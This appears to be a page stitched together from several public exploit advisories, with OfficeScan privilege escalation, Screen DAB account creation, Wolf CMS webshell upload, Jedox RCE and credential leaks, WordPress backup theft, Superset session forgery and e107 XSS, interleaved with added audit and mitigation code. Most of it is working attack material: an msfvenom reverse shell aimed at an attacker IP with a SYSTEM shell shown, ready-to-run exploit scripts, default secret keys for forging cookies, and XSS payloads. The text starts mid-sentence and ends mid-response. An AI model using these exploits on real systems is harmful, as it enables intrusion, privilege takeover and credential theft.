- The vulnerability requires a non-admin privilege (normal) user to be exploited.
Trend Micro OfficeScan Client 10.0 - ACL Service LPE

# Exploit Title: Trend Micro OfficeScan Client 10.0 - ACL Service LPE
# Date: 2023/05/04
# Exploit Author: msd0pe
# Vendor Homepage: https://www.trendmicro.com
# My Github: https://github.com/msd0pe-1

Trend Micro OfficeScan Client versions =< 10.0 contain wrong ACL rights on the OfficeScan client folder, which allows attackers to escalate privileges to the system level through the services. This vulnerability does not need any privileged access.

[1] Verify the folder rights:

> icacls "C:\Program Files (x86)\Trend Micro\OfficeScan Client"
C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
                                                     NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                                                     NT AUTHORITY\SYSTEM:(F)
                                                     NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                     BUILTIN\Administrators:(F)
                                                     BUILTIN\Administrators:(OI)(CI)(IO)(F)
                                                     BUILTIN\Users:(F)
                                                     BUILTIN\Users:(OI)(CI)(IO)(F)
                                                     CREATOR OWNER:(OI)(CI)(IO)(F)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)

[2] Get information about the services:

> sc qc tmlisten
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: tmlisten
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OfficeScan NT Listener
        DEPENDENCIES       : Netman
                           : WinMgmt
        SERVICE_START_NAME : LocalSystem

OR

> sc qc ntrtscan
SERVICE_NAME: ntrtscan
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\ntrtscan.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OfficeScan NT RealTime Scan
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

[3] Generate a reverse shell:

> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o tmlisten.exe
OR
> msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.1.101 LPORT=4444 -f exe -o ntrtscan.exe

[4] Upload the reverse shell to
C:\Program Files(x86)\Trend Micro\OfficeScan Client\tmlisten.exe
OR
C:\Program Files(x86)\Trend Micro\OfficeScan Client\ntrtscan.exe

[5] Start listener
> nc -lvp 4444

[6] Reboot the service/server
> sc stop tmlisten
> sc start tmlisten
OR
> sc stop ntrtscan
> sc start ntrtscan
OR
> shutdown /r

[7] Enjoy !

192.168.1.102: inverse host lookup failed: Unknown host
connect to [192.168.1.101] from (UNKNOWN) [192.168.1.102] 51309
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system
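The two facts that make this an LPE are visible in the command output above: `BUILTIN\Users` holds `(F)` on the install directory, and a service whose `BINARY_PATH_NAME` lives in that directory runs as `LocalSystem`. The audit below is an added example, not the advisory's or the vendor's code; it parses `icacls` and `sc qc` output (the advisory's output embedded here as sample input) and reports a directory as hijackable only when a low-privilege principal has write-capable rights on it and a privileged service binary resides inside it. It assumes `icacls` echoes the queried path verbatim at the start of its first line, which is how the tool prints it.

```python
import re

PATH = r"C:\Program Files (x86)\Trend Micro\OfficeScan Client"

# Sample icacls output, taken from the advisory above
ICACLS_OUTPUT = r"""
C:\Program Files (x86)\Trend Micro\OfficeScan Client NT SERVICE\TrustedInstaller:(F)
                                                     NT SERVICE\TrustedInstaller:(CI)(IO)(F)
                                                     NT AUTHORITY\SYSTEM:(F)
                                                     NT AUTHORITY\SYSTEM:(OI)(CI)(IO)(F)
                                                     BUILTIN\Administrators:(F)
                                                     BUILTIN\Administrators:(OI)(CI)(IO)(F)
                                                     BUILTIN\Users:(F)
                                                     BUILTIN\Users:(OI)(CI)(IO)(F)
                                                     CREATOR OWNER:(OI)(CI)(IO)(F)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(RX)
                                                     APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(OI)(CI)(IO)
"""

# Sample "sc qc tmlisten" output, taken from the advisory above
SC_OUTPUT = r"""
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: tmlisten
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : "C:\Program Files (x86)\Trend Micro\OfficeScan Client\tmlisten.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : OfficeScan NT Listener
        DEPENDENCIES       : Netman
                           : WinMgmt
        SERVICE_START_NAME : LocalSystem
"""

ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<rights>(?:\([^)]*\))+)\s*$")
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}           # inheritance markers, not permissions
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "DC", "WDAC", "WO"}  # anything that lets you replace files
LOW_PRIV = {"BUILTIN\\Users", "Everyone", "NT AUTHORITY\\Authenticated Users",
            "NT AUTHORITY\\INTERACTIVE"}


def parse_icacls(output, path):
    """Return [(principal, {rights})] for every ACE; the queried path prefix on the first line is removed."""
    aces = []
    for raw in output.splitlines():
        line = raw.strip()
        if line.startswith(path):
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        rights = set()
        for group in re.findall(r"\(([^)]*)\)", m.group("rights")):
            for token in group.split(","):
                token = token.strip()
                if token and token not in INHERIT_FLAGS:
                    rights.add(token)
        aces.append((m.group("principal"), rights))
    return aces


def find_weak_aces(output, path):
    """Low-privilege principals that can modify the directory's contents, sorted."""
    return sorted({p for p, rights in parse_icacls(output, path)
                   if p in LOW_PRIV and rights & WRITE_RIGHTS})


def parse_sc_qc(output):
    """Turn 'sc qc' output into {FIELD: value}; continuation lines (extra dependencies) are skipped."""
    fields = {}
    for line in output.splitlines():
        m = re.match(r"^\s*([A-Z_]+)\s*:\s*(.*?)\s*$", line)
        if m:
            fields[m.group(1)] = m.group(2)
    return fields


def service_hijack_risk(sc_output, weak_dirs):
    """True when the service runs as SYSTEM and its binary sits inside a directory writable by low-priv users."""
    f = parse_sc_qc(sc_output)
    binary = f.get("BINARY_PATH_NAME", "").strip('"').lower()
    privileged = f.get("SERVICE_START_NAME", "").lower() in ("localsystem", "nt authority\\system")
    in_weak_dir = any(binary.startswith(d.lower().rstrip("\\") + "\\") for d in weak_dirs)
    return privileged and in_weak_dir


if __name__ == "__main__":
    weak = find_weak_aces(ICACLS_OUTPUT, PATH)
    print("writable by low-privilege principals:", weak)
    print("service hijack risk:", service_hijack_risk(SC_OUTPUT, [PATH] if weak else []))
```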
Screen SFT DAB 600/C - Authentication Bypass Account Creation

#!/usr/bin/env python3
# Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Account Creation
# Exploit Author: LiquidWorm
#
#
# Vendor: DB Elettronica Telecomunicazioni SpA
# Product web page: https://www.screen.it | https://www.dbbroadcast.com
#                   https://www.dbbroadcast.com/products/radio/sft-dab-series-compact-air/
# Affected version: Firmware: 1.9.3
#                   Bios firmware: 7.1 (Apr 19 2021)
#                   Gui: 2.46
#                   FPGA: 169.55
#                   uc: 6.15
#
# Summary: Screen's new radio DAB Transmitter is reaching the highest
# technology level in both Digital Signal Processing and RF domain.
# SFT DAB Series - Compact Radio DAB Transmitter - Air. Thanks to the
# digital adaptive precorrection and configuration flexibility, the Hot
# Swap System technology, the compactness and the smart system design,
# the SFT DAB are advanced transmitters. They support standards DAB,
# DAB+ and T-DMB and are compatible with major headend brands.
#
# Desc: The application suffers from weak session management that can
# allow an attacker on the same network to bypass these controls by reusing
# the same IP address assigned to the victim user (NAT) and exploit crucial
# operations on the device itself. By abusing the IP address property that
# is bound to the Session ID, one needs to await such an established
# session and issue unauthorized requests to the vulnerable API to manage
# and/or manipulate the affected transmitter.
#
# Tested on: Keil-EWEB/2.1
#            MontaVista® Linux® Carrier Grade eXpress (CGX)
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2023-5771
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5771.php
#
#
# 19.03.2023
#

import hashlib, datetime
import requests, colorama
from colorama import Fore, Style

colorama.init()

# The original prints an ASCII-art banner here; it did not survive extraction
print(Fore.RED + Style.BRIGHT + '''
 ZEROSCIENCE
''' + Style.RESET_ALL)

print(Fore.WHITE + Style.BRIGHT + '''
ZSL and the Producers insist that no one submit any exploits
of themselfs or others performing any dangerous activities.
We will not open or view them.
''' + Style.RESET_ALL)

s = datetime.datetime.now()
s = s.strftime('%d.%m.%Y %H:%M:%S')
print('Starting API XPL -', s)

t = input('Enter transmitter ip: ')
u = input('Enter desired username: ')
p = input('Enter desired password: ')
e = '/system/api/userManager.cgx'

# The API expects the MD5 hex digest of the password, not the password itself
m5 = hashlib.md5()
m5.update(p.encode('utf-8'))
h = m5.hexdigest()
print('Your sig:', h)
print('Calling object: ssbtObj')
print('CGX fastcall: userManager::newUser')

t = 'http://' + t + e
bh = {'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
      'Accept': 'application/json, text/plain, */*',
      'Accept-Language': 'ku-MK,en;q=0.9',
      'Accept-Encoding': 'gzip, deflate',
      'User-Agent': 'Dabber++',
      'Connection': 'close'}
j = {'ssbtIdx': 0,
     'ssbtType': 'userManager',
     'ssbtObj': {
         'newUser': {
             'password': h,
             'type': 'OPERATOR',
             'username': u
         }
     },
     }

r = requests.post(t, headers=bh, json=j)
if r.status_code == 200:
    print('Done.')
else:
    print('Error')
    exit(-5)
Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)

# Exploit Title: Wolf CMS 0.8.3.1 - Remote Code Execution (RCE)
# Date: 2023-05-02
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://wolf-cms.readthedocs.io
# Software Link: https://github.com/wolfcms/wolfcms
# Version: 0.8.3.1
# Tested on: Kali Linux

### Steps to Reproduce ###

# Firstly, go to the "Files" tab.
# Click on the "Create new file" button and create a php file (e.g: shell.php)
# Then, click on the file you created to edit it.
# Now, enter your shell code and save the file.
# Finally, go to https://localhost/wolfcms/public/shell.php

### There's your shell! ###
Jedox 2022.4.2 - Code Execution via RPC Interfaces

# Exploit Title: Jedox 2022.4.2 - Code Execution via RPC Interfaces
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2022.4 (22.4.2) and older
# CVE : CVE-2022-47879

Introduction
=================
A Remote Code Execution (RCE) vulnerability in /be/rpc.php and /be/erpc.php allows remote authenticated users to load arbitrary PHP classes from the rtn directory and to execute their methods. To exploit this vulnerability, the attacker needs knowledge about loadable classes, their methods and arguments.

Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

Proof of Concept
=================
1) The `Studio::getUserCreds` function can be used to read the clear text credentials of the currently authenticated user.

PATH: /be/rpc.php
METHOD: POST
BODY: [["Studio", "getUserCreds"]]

2) Using the function `conn::test_palo`, an outgoing HTTP connection can be initiated from the web server to an attacker controlled server (specify HOST and PORT) with the authenticated user's credentials. This could leak cleartext credentials to an attacker.

PATH: /be/rpc.php
METHOD: POST
BODY: [["conn", "test_palo", ["<HOST>", "<PORT>", "", "", true, null]]]

3) The function `Studio::getExternURI` can be used to generate a URL with the embedded username and encrypted password of the currently authenticated user.

PATH: /be/rpc.php
METHOD: POST
BODY: [["Studio", "getExternURI", [0, "", [0], {"flag": 1}]]]

4) List all available database connections via `conn::ls`:

PATH: /be/rpc.php
METHOD: POST
BODY: [["conn", "ls", [null, false, true, ["type", "active", "description"]]]]

5) Retrieve the details of an individual database connection (specify the connection name via CONNECTION), including encrypted credentials, using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`:

PATH: /tc/rpc
METHOD: POST
BODY: [["com.jedox.etl.mngr.Connections", "getGlobalConnection", ["<CONNECTION>"]]]

6) Some functions return credentials only in encrypted form. However, they can be decrypted by any user using `common::decrypt` (specify the encrypted credentials via ENCRYPTEDCREDS):

PATH: /be/rpc.php
METHOD: POST
BODY: [["common", "decrypt", ["<ENCRYPTEDCREDS>"]]]

7) Using `common::paloGet` it is possible to read arbitrary configuration parameters (specify the config param via CONFIG). For example, the password of the SMTP server can be read with it (CONFIG: tasks.smtp.password):

PATH: /be/rpc.php
METHOD: POST
BODY: [["common", "paloGet", [null, "Config", "#_config", ["config"], {"config": ["<CONFIG>"]}, true, true]]]

8) The function `palo_mgmt::sess_list` can be used to retrieve a list of all active user sessions. The session information includes not only the username but also the user's IP address, information about the browser and other data.

PATH: /be/rpc.php
METHOD: POST
BODY: [["palo_mgmt", "sess_list", [null]]]

9) The function `palo_mgmt::lic_users_list` returns a list of all users stored in the system:

PATH: /be/rpc.php
METHOD: POST
BODY: [["palo_mgmt", "lic_users_list", ["0"]]]
HireHackking

Jedox 2022.4.2 - Remote Code Execution via Directory Traversal

# Exploit Title: Jedox 2022.4.2 - Remote Code Execution via Directory Traversal
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2022.4 (22.4.2) and older
# CVE : CVE-2022-47875

Introduction
=================
A directory traversal vulnerability in /be/erpc.php allows remote authenticated users to execute arbitrary code. To exploit the vulnerability, the attacker must have permission to upload files.

Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

Proof of Concept
=================
1) Upload a file using one of the existing file upload mechanisms (e.g. Import in Designer). When a file is uploaded, the web application returns its file system path in the JSON body of the HTTP response (look for `fspath`).

2) Upload a PHP file and note its file system path (`fspath`).

3) Get RCE via directory traversal. The `c` parameter of erpc.php selects the class file to load and is not confined to the rtn directory, so `../` sequences make it load the uploaded file instead:

PATH: /be/erpc.php?c=../../../../../fspath/of/uploaded/file/rce.php
METHOD: POST
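The two Jedox advisories above (CVE-2022-47879 and CVE-2022-47875) describe the same dispatcher failing in two ways: the class name from the request is used as a file path without confinement, and any method of any loaded class can be called. The following is an added example, written for this page and not Jedox code, that models an rpc.php-style dispatcher with both controls in place. RTN_DIR, the ALLOWED table and the registry of callables are hypothetical stand-ins for the PHP classes in the rtn directory.

```python
"""Model of a [class, method, args] RPC dispatcher with path confinement
and a method allowlist. Hypothetical code, not Jedox's own."""
import json
import os
import re

RTN_DIR = "/opt/jedox/ui/be/rtn"               # assumed location of the rtn classes
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")   # a bare PHP class name, nothing else

# Explicit allowlist of class::method pairs the browser is meant to call.
# Anything not listed (common::decrypt, Studio::getUserCreds, ...) is refused.
ALLOWED = {
    "conn": {"ls"},
}


def class_file_unsafe(name):
    """The vulnerable shape: request input concatenated into an include path.
    `../` sequences walk out of RTN_DIR, which is the CVE-2022-47875 pattern."""
    return os.path.join(RTN_DIR, name + ".php")


def traversal_target(name):
    """Where the unsafe join actually lands once the path is normalised."""
    return os.path.normpath(class_file_unsafe(name))


def class_file_safe(name):
    """Reject anything that is not a bare identifier, then confirm the resolved
    path is still inside RTN_DIR (defence in depth against symlinks)."""
    if not isinstance(name, str) or not IDENT.fullmatch(name):
        raise ValueError(f"illegal class name {name!r}")
    root = os.path.realpath(RTN_DIR)
    path = os.path.realpath(os.path.join(root, name + ".php"))
    if os.path.commonpath([root, path]) != root:
        raise ValueError("class path escapes the rtn directory")
    return path


def dispatch(body, registry, allowed=ALLOWED):
    """Handle an rpc.php-style body: JSON list of [class, method, args].
    `registry` maps class -> method -> callable (stand-in for PHP classes)."""
    results = []
    for call in json.loads(body):
        cls, method = call[0], call[1]
        args = call[2] if len(call) > 2 else []
        if not isinstance(cls, str) or not isinstance(method, str):
            results.append({"error": "class and method must be strings"})
            continue
        if method not in allowed.get(cls, ()):
            results.append({"error": f"{cls}::{method} is not callable via RPC"})
            continue
        class_file_safe(cls)                    # the include step, now checked
        results.append({"result": registry[cls][method](*args)})
    return results


if __name__ == "__main__":
    registry = {
        "conn": {"ls": lambda *a: ["warehouse", "reporting"]},
        "common": {"decrypt": lambda s: "would-be-plaintext"},
    }
    print(dispatch('[["conn","ls",[null,false,true]]]', registry))
    print(dispatch('[["common","decrypt",["<ENCRYPTEDCREDS>"]]]', registry))
    print(traversal_target("../../../../../tmp/rce"))
```

The allowlist is the control that matters most here: confining the include path stops the traversal, but as long as every method of every rtn class is reachable, functions such as `common::decrypt` and `common::paloGet` remain a credential oracle for any authenticated user.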

Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module

# Exploit Title: Jedox 2020.2.5 - Stored Cross-Site Scripting in Log-Module
# Date: 28/04/2023
# Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47877

Introduction
=================
A stored cross-site scripting vulnerability allows remote authenticated users to inject arbitrary web script or HTML into the Logs page via the log module. To exploit the vulnerability, the attacker appends an XSS payload to a log message.

Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

Proof of Concept
=================
1) Store a log entry with an XSS payload:

PATH: /ub/ccmd
METHOD: POST
BODY: [["log", "error", "<img src=# onerror=\"alert('XSS')\">"]]

2) Trigger the payload by opening the Logs page and displaying the respective log entry.
# Exploit Title: Jedox 2020.2.5 - Remote Code Execution via Executable Groovy-Scripts
# Date: 28/04/2023
# Exploit Author: Syslifters - Christoph Mahrl, Aron Molnar, Patrick Pirker and Michael Wedl
# Vendor Homepage: https://jedox.com
# Version: Jedox 2020.2 (20.2.5) and older
# CVE : CVE-2022-47876

Introduction
=================
Jedox Integrator allows remote authenticated users to create jobs that execute arbitrary code via Groovy scripts. To exploit the vulnerability, the attacker must be able to create a Groovy job in Integrator.

Write-Up
=================
See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit the vulnerability.

Proof of Concept
=================
1) A user with the appropriate permissions can create Groovy jobs in the Integrator with arbitrary script code. Run the following Groovy script to execute `whoami`; the output of the command can be viewed in the logs:

def sout = new StringBuilder(), serr = new StringBuilder()
def proc = 'whoami'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(10000)
LOG.error(sout.toString());
LOG.error(serr.toString());
# Exploit Title: WordPress Plugin Backup Migration 1.2.8 - Unauthenticated Database Backup
# Google Dork: intitle:("Index of /wp-content/plugins/backup-backup") AND inurl:("plugins/backup-backup/")
# Date: 2023-05-10
# Exploit Author: Wadeek
# Vendor Homepage: https://backupbliss.com/
# Software Link: https://downloads.wordpress.org/plugin/backup-backup.1.2.8.zip
# Version: 1.2.8
# Tested on: WordPress 6.2

1) Get the version of the plugin.

=> GET /wp-content/plugins/backup-backup/readme.txt
--------------------------------------------------------------------------
Stable tag: 1.2.8
--------------------------------------------------------------------------

2) Get the name of the backup directory.

=> GET /wp-content/backup-migration/config.json
--------------------------------------------------------------------------
{
  [...],
  "STORAGE::LOCAL::PATH":"[...]/wp-content/backup-migration-xXxXxxXxXx",
  [...],
  "OTHER:EMAIL":"admin@email.com"
}
--------------------------------------------------------------------------

3) Get the name of the archive containing the backups.

=> GET /wp-content/backup-migration/complete_logs.log
--------------------------------------------------------------------------
BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip
--------------------------------------------------------------------------

4) Build the path for the download.

=> GET /wp-content/backup-migration-xXxXxxXxXx/backups/BM_Backup_YYYY-MM-DD_00_00_00_xXxXxxXxXxxXxXxx.zip

Apache Superset 2.0.0 - Authentication Bypass

# Exploit Title: Apache Superset 2.0.0 - Authentication Bypass
# Date: 10 May 2023
# Exploit Author: MaanVader
# Vendor Homepage: https://superset.apache.org/
# Version: Apache Superset <= 2.0.1
# Tested on: 2.0.0
# CVE: CVE-2023-27524

import argparse
import re

import requests
import urllib3
from flask_unsign import session

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

# Default SECRET_KEY values shipped with Superset releases, templates and docs
SECRET_KEYS = [
    b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h',  # version < 1.4.1
    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',          # version >= 1.4.1
    b'thisISaSECRET_1234',                            # deployment template
    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',          # documentation
    b'TEST_NON_DEV_SECRET',                           # docker compose
]


def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)
    parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')
    args = parser.parse_args()

    try:
        u = args.url.rstrip('/') + '/login/'
        headers = {
            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'
        }
        resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)
        if resp.status_code != 200:
            print(f'Error retrieving login page at {u}, status code: {resp.status_code}')
            return

        # The login page sets an anonymous Flask session cookie; its signature
        # is what we test the default keys against
        session_cookie = None
        for c in resp.cookies:
            if c.name == 'session':
                session_cookie = c.value
                break
        if not session_cookie:
            print('Error: No session cookie found')
            return
        print(f'Got session cookie: {session_cookie}')

        try:
            decoded = session.decode(session_cookie)
            print(f'Decoded session cookie: {decoded}')
        except Exception:
            print('Error: Not a Flask session cookie')
            return

        match = re.search(r'"version_string": "(.*?)&#34', resp.text)
        version = match.group(1) if match else 'Unknown'
        print(f'Superset Version: {version}')

        # Try each known default key until one verifies the cookie signature
        cracked = False
        for k in SECRET_KEYS:
            cracked = session.verify(session_cookie, k)
            if cracked:
                break
        if not cracked:
            print('Failed to crack session cookie')
            return
        print(f'Vulnerable to CVE-2023-27524 - Using default SECRET_KEY: {k}')

        try:
            user_id = int(args.id)
        except ValueError:
            user_id = args.id

        # Sign a session for the chosen user id with the recovered key
        forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)
        print(f'Forged session cookie for user {user_id}: {forged_cookie}')
        u1 = args.url.rstrip('/') + '/superset/welcome'
        print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")
    except Exception as e:
        print(f'Unexpected error: {e}')


if __name__ == '__main__':
    main()
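The exploit above leans on flask_unsign for the signature check and the forgery. To make clear what is actually being tested, here is an added example, written for this page rather than taken from the exploit or from Superset, that re-implements Flask's default session cookie scheme with the standard library only: itsdangerous' URLSafeTimedSerializer with salt "cookie-session", HMAC key derivation and HMAC-SHA1 signatures, using the itsdangerous 2.x timestamp encoding that Flask 2.x installs pull in. CANDIDATE_KEYS mirrors the list in the exploit; the user id and timestamp used in `__main__` are made up.

```python
"""Flask session cookie: sign, verify, decode, and test against default keys.
Independent re-implementation of Flask's SecureCookieSessionInterface
defaults; not Flask, itsdangerous or Superset code."""
import base64
import hashlib
import hmac
import json
import time
import zlib

SALT = b"cookie-session"           # Flask's default session salt

CANDIDATE_KEYS = [
    b"\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h",
    b"CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET",
    b"thisISaSECRET_1234",
    b"YOUR_OWN_RANDOM_GENERATED_SECRET_KEY",
    b"TEST_NON_DEV_SECRET",
]


def _b64e(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64d(enc: bytes) -> bytes:
    return base64.urlsafe_b64decode(enc + b"=" * (-len(enc) % 4))


def derive_key(secret_key: bytes) -> bytes:
    # itsdangerous "hmac" key derivation: HMAC-SHA1(secret, salt)
    return hmac.new(secret_key, SALT, hashlib.sha1).digest()


def sign_session(data: dict, secret_key: bytes, timestamp=None) -> str:
    payload = json.dumps(data, separators=(",", ":")).encode()
    compressed = zlib.compress(payload)
    # itsdangerous compresses only when it saves space, and marks it with "."
    if len(compressed) < len(payload) - 1:
        body = b"." + _b64e(compressed)
    else:
        body = _b64e(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_bytes = ts.to_bytes((ts.bit_length() + 7) // 8 or 1, "big")
    signed = body + b"." + _b64e(ts_bytes)
    sig = hmac.new(derive_key(secret_key), signed, hashlib.sha1).digest()
    return (signed + b"." + _b64e(sig)).decode()


def verify_session(cookie: str, secret_key: bytes) -> bool:
    try:
        signed, sig = cookie.encode().rsplit(b".", 1)
    except ValueError:
        return False
    expected = hmac.new(derive_key(secret_key), signed, hashlib.sha1).digest()
    return hmac.compare_digest(_b64e(expected), sig)


def decode_session(cookie: str) -> dict:
    # The payload is readable by anyone; only the signature needs the key
    body = cookie.encode().rsplit(b".", 2)[0]
    if body.startswith(b"."):
        return json.loads(zlib.decompress(_b64d(body[1:])))
    return json.loads(_b64d(body))


def find_default_key(cookie: str, candidates=CANDIDATE_KEYS):
    """Return the first candidate key that verifies the cookie, else None."""
    for key in candidates:
        if verify_session(cookie, key):
            return key
    return None


if __name__ == "__main__":
    # Constructed demo: a server running with the post-1.4.1 default key
    weak = b"CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET"
    cookie = sign_session({"_user_id": 1, "user_id": 1}, weak, timestamp=1683720000)
    print("cookie:", cookie)
    print("payload:", decode_session(cookie))
    print("default key in use:", find_default_key(cookie))
```

Two points the code makes explicit: the payload is not encrypted, so a cookie leaks its contents regardless of the key, and the whole security of the session rests on the HMAC key, which is why a SECRET_KEY copied from the docs or a template is equivalent to no authentication at all.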

e107 v2.3.2 - Reflected XSS

# Exploit Title: e107 v2.3.2 - Reflected XSS
# Date: 11/05/2023
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 2.3.2
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Reflected - unauthenticated

URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php
Parameters: content

# POC

Request:

POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 1126
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: text/html, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml

Response (the bbcode-to-HTML parser returns the `content` value without encoding it):

HTTP/1.1 200 OK
Date: Thu, 11 May 2023 19:38:45 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1053
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb

### XSS Reflected - authenticated (admin area)

URL: http://127.0.0.1/e107/e107_admin/image.php
Parameters: for

# POC 1

Request:

GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close

Response (the double-encoded `for` value is decoded and written into the uploader's `rel` attribute):

HTTP/1.1 200 OK
Date: Thu, 04 May 2023 03:07:35 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "37f107dbe6a998ecf7b71689627c2a56"
Content-Length: 12420
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: hacked">bbbbb</title>
<meta charset='utf-8' />
